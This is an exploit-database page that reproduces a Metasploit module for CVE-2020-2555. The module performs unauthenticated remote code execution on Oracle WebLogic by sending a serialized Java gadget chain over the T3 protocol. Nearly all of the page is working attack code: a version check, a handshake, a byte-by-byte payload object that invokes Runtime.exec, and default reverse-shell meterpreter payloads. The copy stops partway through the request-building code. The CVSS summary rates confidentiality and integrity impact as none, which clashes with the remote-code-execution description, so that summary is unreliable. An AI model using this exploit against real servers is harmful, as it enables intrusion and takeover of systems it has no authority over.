WebLogic Server Deserialization RCE BadAttributeValueExpException (Metasploit)

CVE: CVE-2020-2555
Category: CWE-502
Price: $1000
Severity: Critical
Author: Metasploit
Risk: High
Exploitation Type: Remote
Date: 2020-05-22

CVSS vector description (metric, value, and what the value means):

Attack Vector (AV): Network. The vulnerable system is bound to the network stack and the set of possible attackers extends beyond the other options listed below, up to and including the entire Internet. Such a vulnerability is often termed "remotely exploitable" and can be thought of as an attack being exploitable at the protocol level one or more network hops away (e.g., across one or more routers). An example of a network attack is an attacker causing a denial of service by sending a specially crafted TCP packet across a wide area network (e.g., CVE-2004-0230).
Attack Complexity (AC): Low. The attacker must take no measurable action to exploit the vulnerability. The attack requires no target-specific circumvention to exploit the vulnerability. An attacker can expect repeatable success against the vulnerable system.
Privileges Required (PR): None. The attacker is unauthenticated prior to attack, and therefore does not require any access to settings or files of the vulnerable system to carry out an attack.
User Interaction (UI): None. The vulnerable system can be exploited without interaction from any human user, other than the attacker. Examples include: a remote attacker is able to send packets to a target system; a locally authenticated attacker executes code to elevate privileges.
Scope (S): Unchanged. An exploited vulnerability can only affect resources managed by the same security authority. In the case of a vulnerability in a virtualized environment, an exploited vulnerability in one guest instance would not affect neighboring guest instances.
Confidentiality (C): None. There is no impact on the confidentiality of the system; the attacker does not gain the ability to read any data.
Integrity (I): None. There is no impact on the integrity of the system; the attacker does not gain the ability to modify any files or information on the target system.
Availability (A): High. There is a total shutdown of the affected resource. The attacker can deny access to the system or data, potentially causing significant loss to the organization.
Our sensors found this exploit at: https://cxsecurity.com/ascii/WLB-2020050174
Below is a copy:

WebLogic Server Deserialization RCE BadAttributeValueExpException (Metasploit)

##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
class MetasploitModule < Msf::Exploit::Remote
Rank = NormalRanking
include Msf::Exploit::Remote::Tcp
include Msf::Exploit::CmdStager
include Msf::Exploit::Powershell
include Msf::Exploit::Remote::AutoCheck
def initialize(info = {})
super(
update_info(
info,
'Name' => 'WebLogic Server Deserialization RCE - BadAttributeValueExpException',
'Description' => %q{
There exists a Java object deserialization vulnerability
in multiple versions of WebLogic.
Unauthenticated remote code execution can be achieved
by sending a serialized BadAttributeValueExpException object
over the T3 protocol to vulnerable WebLogic servers.
},
'License' => MSF_LICENSE,
'Author' =>
[
'Jang', # Vuln Discovery
'Y4er', # PoC
'Shelby Pace' # Metasploit Module
],
'References' =>
[
[ 'CVE', '2020-2555' ],
[ 'URL', 'https://www.thezdi.com/blog/2020/3/5/cve-2020-2555-rce-through-a-deserialization-bug-in-oracles-weblogic-server' ],
[ 'URL', 'https://github.com/Y4er/CVE-2020-2555' ]
],
'Platform' => %w[unix linux win],
'Arch' => [ ARCH_X86, ARCH_X64 ],
'Privileged' => false,
'Targets' =>
[
[
'Windows',
{
'Platform' => 'win',
'Arch' => [ ARCH_X86, ARCH_X64 ],
'DefaultOptions' => { 'Payload' => 'windows/meterpreter/reverse_tcp' }
}
],
[
'Unix',
{
'Platform' => %w[unix linux],
'CmdStagerFlavor' => 'printf',
'Arch' => [ ARCH_X86, ARCH_X64 ],
'DefaultOptions' => { 'Payload' => 'linux/x86/meterpreter/reverse_tcp' }
}
],
],
'DisclosureDate' => '2020-01-15',
'DefaultTarget' => 0
)
)
register_options([ Opt::RPORT(7001) ])
end
def check
connect
web_req = "GET /console/login/LoginForm.jsp HTTP/1.1\nHost: #{peer}\n\n"
sock.put(web_req)
sleep(2)
res = sock.get_once
versions = [ Gem::Version.new('12.1.3.0.0'), Gem::Version.new('12.2.1.3.0'), Gem::Version.new('12.2.1.4.0') ]
return CheckCode::Unknown('Failed to obtain response from service') unless res
/WebLogic\s+Server\s+Version:\s+(?<version>\d+\.\d+\.\d+\.*\d*\.*\d*)/ =~ res
return CheckCode::Unknown('Failed to detect WebLogic') unless version
@version_no = Gem::Version.new(version)
print_status("WebLogic version detected: #{@version_no}")
return CheckCode::Appears if versions.include?(@version_no)
CheckCode::Detected('Version of WebLogic is not vulnerable')
ensure
disconnect
end
def exploit
super
connect
print_status('Sending handshake...')
t3_handshake
if target.name == 'Windows'
win_obj = cmd_psh_payload(payload.encoded, payload_instance.arch.first, { remove_comspec: true })
win_obj.prepend('cmd.exe /c ')
win_obj = build_payload_obj(win_obj)
t3_send(win_obj)
else
execute_cmdstager
end
ensure
disconnect
end
def t3_handshake
# t3 12.2.1\nAS:255
# \nHL:19\nMS:100000
# 00\n\n
shake = '74332031322e322e310a41533a323535'
shake << '0a484c3a31390a4d533a313030303030'
shake << '30300a0a'
sock.put([shake].pack('H*'))
sleep(1)
sock.get_once
end
def build_payload_obj(payload_data)
payload_obj = 'aced' # STREAM_MAGIC
payload_obj << '0005' # STREAM_VERSION
payload_obj << '7372' # TC_OBJECT, TC_CLASSDESC
payload_obj << '002e' # Class name length: 46
payload_obj << '6a617661782e6d616e61' # Class name: javax.management.BadAttributeValueExpException
payload_obj << '67656d656e742e426164'
payload_obj << '41747472696275746556'
payload_obj << '616c7565457870457863'
payload_obj << '657074696f6e'
payload_obj << 'd4e7daab632d4640' # SerialVersionUID
payload_obj << '020001' # Serialization flag, field num = 1
payload_obj << '4c0003' # Field type code: 4c = Object, field name length: 3
payload_obj << '76616c' # Field name: val
payload_obj << '740012' # String, length: 18
payload_obj << '4c6a6176612f6c616e672f4f626a6563743b' # Ljava/lang/Object;
payload_obj << '7872' # end block data, TC_CLASSDESC
payload_obj << '0013' # Class name length: 19
payload_obj << '6a6176612e6c616e672e' # java.lang.Exception
payload_obj << '457863657074696f6e'
payload_obj << 'd0fd1f3e1a3b1cc4' # SerialVersionUID
payload_obj << '020000' # Serializable, No fields
payload_obj << '7872' # end block data, TC_CLASSDESC
payload_obj << '0013' # Class name length: 19
payload_obj << '6a6176612e6c616e672e' # java.lang.Throwable
payload_obj << '5468726f7761626c65'
payload_obj << 'd5c635273977b8cb' # SerialVersionUID
payload_obj << '030004' # flags: SC_WRITE_METHOD | SC_SERIALIZABLE, then 4 fields
payload_obj << '4c0005' # Field type: Object, field name length: 5
payload_obj << '6361757365' # Field name: cause
payload_obj << '740015' # String, length: 21
payload_obj << '4c6a6176612f6c616e67' # Ljava/lang/Throwable;
payload_obj << '2f5468726f7761626c653b'
payload_obj << '4c000d' # Field type: Object, field name length: 13
payload_obj << '64657461696c4d657373616765' # Field name: detailMessage
payload_obj << '740012' # String, length: 18
payload_obj << '4c6a6176612f6c616e67' # Ljava/lang/String;
payload_obj << '2f537472696e673b'
payload_obj << '5b000a' # Field type: 5b = array, field name length: 10
payload_obj << '737461636b5472616365' # Field name: stackTrace
payload_obj << '74001e' # String, length: 30
payload_obj << '5b4c6a6176612f6c616e' # [Ljava/lang/StackTraceElement;
payload_obj << '672f537461636b547261'
payload_obj << '6365456c656d656e743b'
payload_obj << '4c0014' # Field type: Object, field name length: 20
payload_obj << '73757070726573736564' # Field name: suppressedExceptions
payload_obj << '457863657074696f6e73'
payload_obj << '740010' # String, length: 16
payload_obj << '4c6a6176612f7574696c' # Ljava/util/List;
payload_obj << '2f4c6973743b'
payload_obj << '7870' # TC_ENDBLOCKDATA, TC_NULL
payload_obj << '71' # TC_REFERENCE
payload_obj << '007e0008' # handle?
payload_obj << '7075' # TC_NULL, TC_ARRAY
payload_obj << '72001e' # TC_CLASSDESC, Class name length: 30
payload_obj << '5b4c6a6176612e6c616e' # [Ljava.lang.StackTraceElement;
payload_obj << '672e537461636b547261'
payload_obj << '6365456c656d656e743b'
payload_obj << '02462a3c3cfd2239' # SerialVersionUID
payload_obj << '020000' # Serializable, No fields
payload_obj << '7870' # TC_ENDBLOCKDATA, TC_NULL
payload_obj << '00000001' # array length: 1
payload_obj << '7372' # TC_OBJECT, TC_CLASSDESC
payload_obj << '001b' # Class name length: 27
payload_obj << '6a6176612e6c616e672e' # java.lang.StackTraceElement
payload_obj << '537461636b5472616365'
payload_obj << '456c656d656e74'
payload_obj << '6109c59a2636dd85' # SerialVersionUID
payload_obj << '020004' # Serializable, 4 fields
payload_obj << '49000a' # Field type: 49 = Integer, field name length: 10
payload_obj << '6c696e654e756d626572' # lineNumber
payload_obj << '4c000e' # Field type: Object, field name length: 14
payload_obj << '6465636c6172696e6743'
payload_obj << '6c617373' # declaringClass
payload_obj << '71' # TC_REFERENCE
payload_obj << '007e0005' # handle
payload_obj << '4c0008' # Field type: Object, field name length: 8
payload_obj << '66696c654e616d65' # fileName
payload_obj << '71' # TC_REFERENCE
payload_obj << '007e0005' # handle
payload_obj << '4c000a' # Field type: Object, field name length: 10
payload_obj << '6d6574686f644e616d65' # methodName
payload_obj << '71' # TC_REFERENCE
payload_obj << '007e0005' # handle
payload_obj << '7870' # TC_ENDBLOCKDATA, TC_NULL
payload_obj << '00000028'
class_name = Rex::Text.rand_text_alphanumeric(8..14)
formatted_class = class_name.each_byte.map { |b| b.to_s(16).rjust(2, '0') }.join
payload_obj << '74' # String
payload_obj << class_name.length.to_s(16).rjust(4, '0')
payload_obj << formatted_class # Originally Weblogic_2555 -> PoC class name
payload_obj << '74' # String
payload_obj << (class_name.length + 5).to_s(16).rjust(4, '0')
payload_obj << formatted_class # Originally Weblogic_2555.java
payload_obj << '2e6a617661' # .java
payload_obj << '740004' # String, length: 4
payload_obj << '6d61696e' # main
payload_obj << '7372' # TC_OBJECT, TC_CLASSDESC
payload_obj << '0026' # Class name length: 38
payload_obj << '6a6176612e7574696c2e' # java.util.Collections$UnmodifiableList
payload_obj << '436f6c6c656374696f6e'
payload_obj << '7324556e6d6f64696669'
payload_obj << '61626c654c697374'
payload_obj << 'fc0f2531b5ec8e10' # SerialVersionUID
payload_obj << '020001' # Serializable, 1 field
payload_obj << '4c0004' # Field type: Object, field name length: 4
payload_obj << '6c697374' # list
payload_obj << '71' # TC_REFERENCE
payload_obj << '007e0007' # handle
payload_obj << '7872' # TC_ENDBLOCKDATA, TC_CLASSDESC
payload_obj << '002c' # Class name length: 44
payload_obj << '6a6176612e7574696c2e' # java.util.Collections$UnmodifiableCollection
payload_obj << '436f6c6c656374696f6e'
payload_obj << '7324556e6d6f64696669'
payload_obj << '61626c65436f6c6c6563'
payload_obj << '74696f6e'
payload_obj << '19420080cb5ef71e' # SerialVersionUID
payload_obj << '020001' # Serializable, 1 field
payload_obj << '4c0001' # Field type: Object, field name length: 1
payload_obj << '63' # Field name: c
payload_obj << '740016' # String, length: 22
payload_obj << '4c6a6176612f7574696c' # Ljava/util/Collection;
payload_obj << '2f436f6c6c656374696f'
payload_obj << '6e3b'
payload_obj << '7870' # TC_ENDBLOCKDATA, TC_NULL
payload_obj << '7372' # TC_OBJECT, TC_CLASSDESC
payload_obj << '0013' # Class name length: 19
payload_obj << '6a6176612e7574696c2e' # java.util.ArrayList
payload_obj << '41727261794c697374'
payload_obj << '7881d21d99c7619d' # SerialVersionUID
payload_obj << '030001' # flags: SC_WRITE_METHOD | SC_SERIALIZABLE, 1 field
payload_obj << '490004' # Field type: Integer, field name length: 4
payload_obj << '73697a65' # size
payload_obj << '7870' # TC_ENDBLOCKDATA, TC_NULL
payload_obj << '00000000'
payload_obj << '7704' # TC_BLOCKDATA, length: 4
payload_obj << '00000000'
payload_obj << '7871' # TC_ENDBLOCKDATA, TC_REFERENCE
payload_obj << '007e0015' # handle
payload_obj << '78' # TC_ENDBLOCKDATA
payload_obj << '7372' # TC_OBJECT, TC_CLASSDESC
payload_obj << '0024' # Class name length: 36
payload_obj << '636f6d2e74616e676f73' # com.tangosol.util.filter.LimitFilter
payload_obj << '6f6c2e7574696c2e6669'
payload_obj << '6c7465722e4c696d6974'
payload_obj << '46696c746572'
payload_obj << limit_filter_uid # SerialVersionUID
payload_obj << '020006' # Serializable, 6 fields
payload_obj << '49000b' # Field type: Integer, field name length: 11
payload_obj << '6d5f635061676553697a65' # m_cPageSize
payload_obj << '490007' # Field type: Integer, field name length: 7
payload_obj << '6d5f6e50616765' # m_nPage
payload_obj << '4c000c' # Field type: Object, field name length: 12
payload_obj << '6d5f636f6d70617261746f72' # m_comparator
payload_obj << '740016' # String, length: 22
payload_obj << '4c6a6176612f7574696c' # Ljava/util/Comparator;
payload_obj << '2f436f6d70617261746f'
payload_obj << '723b'
payload_obj << '4c0008' # Field type: Object, field name length: 8
payload_obj << '6d5f66696c746572' # m_filter
payload_obj << '74001a' # String, length: 26
payload_obj << '4c636f6d2f74616e676f' # Lcom/tangosol/util/Filter;
payload_obj << '736f6c2f7574696c2f46'
payload_obj << '696c7465723b'
payload_obj << '4c000f' # Field type: Object, field name length: 15
payload_obj << '6d5f6f416e63686f7242' # m_oAnchorBottom
payload_obj << '6f74746f6d'
payload_obj << '71' # TC_REFERENCE
payload_obj << '007e0001' # handle
payload_obj << '4c000c' # Field type: Object, field name length: 12
payload_obj << '6d5f6f416e63686f72546f70' # m_oAnchorTop
payload_obj << '71' # TC_REFERENCE
payload_obj << '007e0001' # handle
unless @version_no == Gem::Version.new('12.1.3.0.0')
payload_obj << add_class_desc
end
payload_obj << '7870' # TC_ENDBLOCKDATA, TC_NULL
payload_obj << '00000000'
payload_obj << '00000000'
payload_obj << '7372' # TC_OBJECT, TC_CLASSDESC
payload_obj << '002c' # Class name length: 44
payload_obj << '636f6d2e74616e676f73' # com.tangosol.util.extractor.ChainedExtractor
payload_obj << '6f6c2e7574696c2e6578'
payload_obj << '74726163746f722e4368'
payload_obj << '61696e65644578747261'
payload_obj << '63746f72'
payload_obj << chained_extractor_uid # SerialVersionUID
payload_obj << '020000' # Serializable, no fields
payload_obj << '7872' # TC_ENDBLOCKDATA, TC_CLASSDESC
payload_obj << '0036' # Class name length: 54
payload_obj << '636f6d2e74616e676f73' # com.tangosol.util.extractor.AbstractCompositeExtractor
payload_obj << '6f6c2e7574696c2e6578'
payload_obj << '74726163746f722e4162'
payload_obj << '737472616374436f6d70'
payload_obj << '6f736974654578747261'
payload_obj << '63746f72'
payload_obj << '086b3d8c05690f44' # SerialVersionUID
payload_obj << '020001' # Serializable, 1 field
payload_obj << '5b000c' # Field type: Array, field name length: 12
payload_obj << '6d5f61457874726163746f72' # m_aExtractor
payload_obj << '740023' # String, length: 35
payload_obj << '5b4c636f6d2f74616e67' # [Lcom/tangosol/util/ValueExtractor;
payload_obj << '6f736f6c2f7574696c2f'
payload_obj << '56616c75654578747261'
payload_obj << '63746f723b'
payload_obj << '7872' # TC_ENDBLOCKDATA, TC_CLASSDESC
payload_obj << '002d' # Class name length: 45
payload_obj << '636f6d2e74616e676f73' # com.tangosol.util.extractor.AbstractExtractor
payload_obj << '6f6c2e7574696c2e6578'
payload_obj << '74726163746f722e4162'
payload_obj << '73747261637445787472'
payload_obj << '6163746f72'
payload_obj << abstract_extractor_uid # SerialVersionUID
payload_obj << '020001' # Serializable, 1 field
payload_obj << '490009' # Field type: Integer, field name length: 9
payload_obj << '6d5f6e546172676574' # m_nTarget
payload_obj << '7870' # TC_ENDBLOCKDATA, TC_NULL
payload_obj << '00000000'
payload_obj << '7572' # TC_ARRAY, TC_CLASSDESC
payload_obj << '0032' # Class name length: 50
payload_obj << '5b4c636f6d2e74616e67' # [Lcom.tangosol.util.extractor.ReflectionExtractor;
payload_obj << '6f736f6c2e7574696c2e'
payload_obj << '657874726163746f722e'
payload_obj << '5265666c656374696f6e'
payload_obj << '457874726163746f723b'
payload_obj << 'dd8b89aed70273ca' # SerialVersionUID
payload_obj << '020000' # Serializable, no fields
payload_obj << '7870' # TC_ENDBLOCKDATA, TC_NULL
payload_obj << '00000003' # array length: 3
payload_obj << '7372' # TC_OBJECT, TC_CLASSDESC
payload_obj << '002f' # Class name length: 47
payload_obj << '636f6d2e74616e676f73' # com.tangosol.util.extractor.ReflectionExtractor
payload_obj << '6f6c2e7574696c2e6578'
payload_obj << '74726163746f722e5265'
payload_obj << '666c656374696f6e4578'
payload_obj << '74726163746f72'
payload_obj << reflection_extractor_uid # SerialVersionUID
payload_obj << '02000' # SC_SERIALIZABLE; the field count's last nibble comes from reflect_extract_count (originally 020002)
payload_obj << reflect_extract_count
payload_obj << '5b0009' # Field type: Array, field name length: 9
payload_obj << '6d5f616f506172616d' # m_aoParam
payload_obj << '740013' # String, length: 19
payload_obj << '5b4c6a6176612f6c616e' # [Ljava/lang/Object;
payload_obj << '672f4f626a6563743b'
payload_obj << add_sect
payload_obj << '4c0009' # Object, length: 9
payload_obj << '6d5f734d6574686f64' # m_sMethod
payload_obj << '71' # TC_REFERENCE
payload_obj << '007e0005' # handle
payload_obj << '7871' # TC_ENDBLOCKDATA, TC_REFERENCE
payload_obj << (change_handle? ? '007e001d' : '007e001e')
payload_obj << '00000000'
payload_obj << '7572' # TC_ARRAY, TC_CLASSDESC
payload_obj << '0013' # Class name length: 19
payload_obj << '5b4c6a6176612e6c616e' # [Ljava.lang.Object;
payload_obj << '672e4f626a6563743b'
payload_obj << '90ce589f1073296c' # SerialVersionUID
payload_obj << '020000' # Serializable, no fields
payload_obj << '7870' # TC_ENDBLOCKDATA, TC_NULL
payload_obj << '00000002' # array length: 2
payload_obj << '74000a' # String, length: 10
payload_obj << '67657452756e74696d65' # getRuntime
payload_obj << '7572' # TC_ARRAY, TC_CLASSDESC
payload_obj << '0012' # Class name length: 18
payload_obj << '5b4c6a6176612e6c616e' # [Ljava.lang.Class;
payload_obj << '672e436c6173733b'
payload_obj << 'ab16d7aecbcd5a99' # SerialVersionUID
payload_obj << '020000' # Serializable, no fields
payload_obj << '7870' # TC_ENDBLOCKDATA, TC_NULL
payload_obj << '00000000' # array length: 0
payload_obj << add_tc_null
payload_obj << '740009' # String, length: 9
payload_obj << '6765744d6574686f64' # getMethod
payload_obj << '7371' # TC_OBJECT, TC_REFERENCE
payload_obj << (change_handle? ? '007e0021' : '007e0022')
payload_obj << '00000000'
payload_obj << '7571' # TC_ARRAY, TC_REFERENCE
payload_obj << (change_handle? ? '007e0024' : '007e0025')
payload_obj << '00000002' # array size: 2
payload_obj << '7075' # TC_NULL, TC_ARRAY
payload_obj << '71' # TC_REFERENCE
payload_obj << (change_handle? ? '007e0024' : '007e0025')
payload_obj << '00000000'
payload_obj << add_tc_null
payload_obj << '740006' # TC_STRING, length: 6
payload_obj << '696e766f6b65' # invoke
payload_obj << '7371' # TC_OBJECT, TC_REFERENCE
payload_obj << (change_handle? ? '007e0021' : '007e0022')
payload_obj << '00000000'
payload_obj << '7571' # TC_ARRAY, TC_REFERENCE
payload_obj << (change_handle? ? '007e0024' : '007e0025')
payload_obj << '00000001' # array length: 1
payload_obj << '7572' # TC_ARRAY, TC_CLASSDESC
payload_obj << '0013' # Class name length: 19
payload_obj << '5b4c6a6176612e6c616e' # [Ljava.lang.String;
payload_obj << '672e537472696e673b'
payload_obj << 'add256e7e91d7b47' # SerialVersionUID
payload_obj << '020000' # Serializable, no fields
payload_obj << '7870' # TC_ENDBLOCKDATA, TC_NULL
payload_obj << '00000003' # array length: 3
payload_bin = format_payload(payload_data)
payload_obj << payload_bin
# Original data
# ---------------------------
# payload_obj << '740007' # String, length: 7
# payload_obj << '2f62696e2f7368' # /bin/sh
# payload_obj << '740002' # String, length: 2
# payload_obj << '2d63' # -c
# payload_obj << '740017' # String, length: 23
# payload_obj << '746f756368202f746d70' # touch /tmp/blah_ze_blah
# payload_obj << '2f626c61685f7a655f62'
# payload_obj << '6c6168'
# ---------------------------
payload_obj << add_tc_null
payload_obj << '740004' # String, length: 4
payload_obj << '65786563' # exec
payload_obj << '7070' # TC_NULL, TC_NULL
payload_obj << '7672' # TC_CLASS, TC_CLASSDESC
payload_obj << '0011' # Class name length: 17
payload_obj << '6a6176612e6c616e672e' # java.lang.Runtime
payload_obj << '52756e74696d65'
payload_obj << '00000000000000000000' # SerialVersionUID: 0, flags: 0, first byte of the field count
payload_obj << '00' # second byte of the field count: no fields
payload_obj << '7870' # TC_ENDBLOCKDATA, TC_NULL
end
def change_handle?
@version_no == Gem::Version.new('12.1.3.0.0')
end
def limit_filter_uid
case @version_no
when Gem::Version.new('12.1.3.0.0')
'99022596d7b45953'
when Gem::Version.new('12.2.1.3.0')
'ab2901b976c4e271'
else
'954e4590be89865f'
end
end
def chained_extractor_uid
case @version_no
when Gem::Version.new('12.1.3.0.0')
'889f81b0945d5b7f'
when Gem::Version.new('12.2.1.3.0')
'06ee10433a4cc4b4'
else
'435b250b72f63db5'
end
end
def abstract_extractor_uid
case @version_no
when Gem::Version.new('12.1.3.0.0')
'658195303e723821'
when Gem::Version.new('12.2.1.3.0')
'752289ad4d460138'
else
'9b1be18ed70100e5'
end
end
def reflection_extractor_uid
case @version_no
when Gem::Version.new('12.1.3.0.0')
'ee7ae995c02fb4a2'
when Gem::Version.new('12.2.1.3.0')
'87973791b26429dd'
else
'1f62f564b951b614'
end
end
def reflect_extract_count
case @version_no
when Gem::Version.new('12.2.1.3.0')
'3'
else
'2'
end
end
def add_sect
sect = ''
if @version_no == Gem::Version.new('12.2.1.3.0')
sect << '4c0011' # Object, length: 17
sect << '6d5f657874726163746f' # m_extractorCached
sect << '72436163686564'
sect << '71' # TC_REFERENCE
sect << '007e0001' # handle
end
sect
end
def add_class_desc
class_desc = ''
class_desc << '7872' # TC_ENDBLOCKDATA, TC_CLASSDESC
class_desc << '0034' # Class name length: 52
class_desc << '636f6d2e74616e676f73' # com.tangosol.util.filter.AbstractQueryRecorderFilter
class_desc << '6f6c2e7574696c2e6669'
class_desc << '6c7465722e4162737472'
class_desc << '61637451756572795265'
class_desc << '636f7264657246696c74'
class_desc << '6572'
class_desc << 'f3b98201f680eb90' # SerialVersionUID
class_desc << '020000' # Serializable, no fields
end
def add_tc_null
return '70' if @version_no == Gem::Version.new('12.2.1.3.0')
''
end
def t3_send(payload_obj)
print_status('Sending object...')
request_obj = '000009f3' # Original packet length
request_obj << '016501' # CMD_IDENTIFY_REQUEST, flags
request_obj << 'ffffffffffffffff'
request_obj << '00000071'
request_obj << '0000ea60'
request_obj << '00000018432ec6'
request_obj << 'a2a63985b5af7d63e643'
request_obj << '83f42a6d92c9e9af0f94'
request_obj << '72027973720078720178'
request_obj << '720278700000000c0000'
request_obj << '00020000000000000000'
request_obj << '00000001007070707070'
request_obj << '700000000c0000000200'
request_obj << '00000000000000000000'
request_obj << '01007006'
request_obj << 'fe010000' # separator
request_obj << 'aced0005' # STREAM_MAGIC, STREAM_VERSION
request_obj << '7372' # TC_OBJECT, TC_CLASSDESC
request_obj << '001d' # Class name length: 29
request_obj << '7765626c6f6769632e72' # weblogic.rjvm.ClassTableEntry
request_obj << '6a766d2e436c61737354'
request_obj << '61626c65456e747279'
request_obj << '2f52658157f4f9ed' # SerialVersionUID
request_obj << '0c0000' # flags: SC_BLOCK_DATA | SC_EXTERNALIZABLE, no fields
request_obj << '787072' # TC_ENDBLOCKDATA, TC_NULL, TC_CLASSDESC
request_obj << '0024' # Class name length: 36
request_obj << '7765626c6f6769632e63' # weblogic.common.internal.PackageInfo
request_obj << '6f6d6d6f6e2e696e7465'
request_obj << '726e616c2e5061636b61'
request_obj << '6765496e666f'
request_obj << 'e6f723e7b8ae1ec9' # SerialVersionUID
request_obj << '020009' # Serializable, 9 fields
request_obj << '490005' # Field type: Int, field name length: 5
request_obj << '6d616a6f72' # major
request_obj << '490005' # Field type: Int, field name length: 5
request_obj << '6d696e6f72' # minor
request_obj << '49000b' # Field type: Int, field name length: 11
request_obj << '70617463685570646174' # patchUpdate
request_obj << '65'
request_obj << '49000c' # Field type: Int, field name length: 12
request_obj << '726f6c6c696e67506174' # rollingPatch
request_obj << '6368'
request_obj << '49000b' # Field type: Int, field name length: 11
request_obj << '73657276696365506163' # servicePack
request_obj << '6b'
request_obj << '5a000e' # Field type: Z = Bool, field name length: 14
request_obj << '74656d706f7261727950' # temporaryPatch
request_obj << '61746368'
request_obj << '4c0009' # Field type: Object, field name length: 9
request_obj << '696d706c5469746c65' # implTitle
request_obj << '740012' # String, length: 18
request_obj << '4c6a6176612f6c616e67' # Ljava/lang/String;
request_obj << '2f537472696e673b'
request_obj << '4c000a' # Field type: Object, field name length: 10
request_obj << '696d706c56656e646f72' # implVendor
request_obj << '71007e0003' # TC_REFERENCE, handle
request_obj << '4c000b' # Field type: Object, field name length: 11
request_obj << '696d706c56657273696f6e' # implVersion
request_obj << '71007e0003' # TC_REFERENCE, handle
request_obj << '7870' # TC_ENDBLOCKDATA, TC_NULL
request_obj << '7702' # TC_BLOCKDATA, length: 2
request_obj << '000078' # 2 bytes of block data, TC_ENDBLOCKDATA
request_obj << 'fe010000' # separator
request_obj << payload_obj
request_obj << 'fe010000' # separator
request_obj << 'aced0005' # STREAM_MAGIC, STREAM_VERSION
request_obj << '7372' # TC_OBJECT, TC_CLASSDESC
request_obj << '001d' # Class name length: 29
request_obj << '7765626c6f6769632e72' # weblogic.rjvm.ClassTableEntry
request_obj << '6a766d2e436c61737354'
request_obj << '61626c65456e747279'
request_obj << '2f52658157f4f9ed' # SerialVersionUID
request_obj << '0c0000' # flags: SC_BLOCK_DATA | SC_EXTERNALIZABLE, no fields
request_obj << '787072' # TC_ENDBLOCKDATA, TC_NULL, TC_CLASSDESC
request_obj << '0021' # Class name length: 33
request_obj << '7765626c6f6769632e63' # weblogic.common.internal.PeerInfo
request_obj << '6f6d6d6f6e2e696e7465'
request_obj << '726e616c2e5065657249'
request_obj << '6e666f'
request_obj << '585474f39bc908f1' # SerialVersionUID
request_obj << '020007' # Serializable, 7 fields
request_obj << '490005' # Field type: Int, field name length: 5
request_obj << '6d616a6f72' # major
request_obj << '490005' # Field type: Int, field name length: 5
request_obj << '6d696e6f72' # minor
request_obj << '49000b' # Field type: Int, field name length: 11
request_obj << '70617463685570646174' # patchUpdate
request_obj << '65'
request_obj << '49000c' # Field type: Int, field name length: 12
request_obj << '726f6c6c696e67506174' # rollingPatch
request_obj << '6368'
request_obj << '49000b' # Field type: Int, field name length: 11
request_obj << '73657276696365506163' # servicePack
request_obj << '6b'
request_obj << '5a000e' # Field type: Z = Bool, field name length: 14
request_obj << '74656d706f7261727950' # temporaryPatch
request_obj << '61746368'
request_obj << '5b0008' # Field type: Array, field name length: 8
request_obj << '7061636b61676573' # packages
request_obj << '740027' # String, length: 39
request_obj << '5b4c7765626c6f676963' # [Lweblogic/common/internal/PackageInfo;
request_obj << '2f636f6d6d6f6e2f696e'
request_obj << '7465726e616c2f506163'
request_obj << '6b616765496e666f3b'
request_obj << '7872' # TC_ENDBLOCKDATA, TC_CLASSDESC
request_obj << '0024' # Class name length: 36
request_obj << '7765626c6f6769632e63' # weblogic.common.internal.VersionInfo
request_obj << '6f6d6d6f6e2e696e7465'
request_obj << '726e616c2e5665727369'
request_obj << '6f6e496e666f'
request_obj << '972245516452463e' # SerialVersionUID
request_obj << '020003' # Serializable, 3 fields
request_obj << '5b0008' # Field type: Array, field name length: 8
request_obj << '7061636b61676573' # packages
request_obj << '71007e0003' # TC_REFERENCE, handle
request_obj << '4c000e' # Field type: Object, field name length: 14
request_obj << '72656c65617365566572' # releaseVersion
request_obj << '73696f6e'
request_obj << '740012' # String, length: 18
request_obj << '4c6a6176612f6c616e67' # Ljava/lang/String;
request_obj << '2f537472696e673b'
request_obj << '5b0012' # Field type: Array, field name length: 18
request_obj << '76657273696f6e496e66' # versionInfoAsBytes
request_obj << '6f41734279746573'
request_obj << '740002' # String, length: 2
request_obj << '5b42' # [B
request_obj << '7872' # TC_ENDBLOCKDATA, TC_CLASSDESC
request_obj << '0024' # Class name length: 36
request_obj << '7765626c6f6769632e63' # weblogic.common.internal.PackageInfo
request_obj << '6f6d6d6f6e2e696e7465'
request_obj << '726e616c2e5061636b61'
request_obj << '6765496e666f'
request_obj << 'e6f723e7b8ae1ec9' # SerialVersionUID
request_obj << '020009' # Serializable, 9 fields
request_obj << '490005' # Field type: Int, field name length: 5
request_obj << '6d616a6f72' # major
request_obj << '490005' # Field type: Int, field name length: 5
request_obj << '6d696e6f72' # minor
request_obj << '49000b' # Field type: Int, field name length: 11
request_obj << '70617463685570646174' # patchUpdate
request_obj << '65'
request_obj << '49000c' # Field type: Int, field name length: 12
request_obj << '726f6c6c696e67506174' # rollingPatch
request_obj << '6368'
request_obj << '49000b' # Field type: Int, field name length: 11
request_obj << '73657276696365506163' # servicePack
request_obj << '6b'
request_obj << '5a000e' # Field type: Z = Bool, field name length: 14
request_obj << '74656d706f7261727950' # temporaryPatch
request_obj << '61746368'
request_obj << '4c0009' # Field type: Object, field name length: 9
request_obj << '696d706c5469746c65' # implTitle
request_obj << '71007e0005' # TC_REFERENCE, handle
request_obj << '4c000a' # Field type: Object, field name length: 10
request_obj << '696d706c56656e646f72' # implVendor
request_obj << '71007e0005' # TC_REFERENCE, handle
request_obj << '4c000b' # Field type: Object, field name length: 11
request_obj << '696d706c56657273696f' # implVersion
request_obj << '6e'
request_obj << '71007e0005' # TC_REFERENCE, handle
request_obj << '7870' # TC_ENDBLOCKDATA, TC_NULL
request_obj << '7702000078' # TC_BLOCKDATA, 2 bytes, TC_ENDBLOCKDATA
request_obj << 'fe00ff' # separator
request_obj << 'fe010000'
request_obj << 'aced0005' # STREAM_MAGIC, STREAM_VERSION
request_obj << '7372' # TC_OBJECT, TC_CLASSDESC
request_obj << '0013' # Class name length: 19
request_obj << '7765626c6f6769632e72' # weblogic.rjvm.JVMID
request_obj << '6a766d2e4a564d4944'
request_obj << 'dc49c23ede121e2a' # SerialVersionUID
request_obj << '0c0000' # flags: SC_BLOCK_DATA | SC_EXTERNALIZABLE, no fields
request_obj << '787077' # TC_ENDBLOCKDATA, TC_NULL, TC_BLOCKDATA
request_obj << '4621'
request_obj << '000000000000000000'
request_obj << '09' # length: 9
request_obj << '3132372e302e312e31' # 127.0.1.1
request_obj << '000b' # length: 11
request_obj << '75732d6c2d627265656e' # us-l-breens
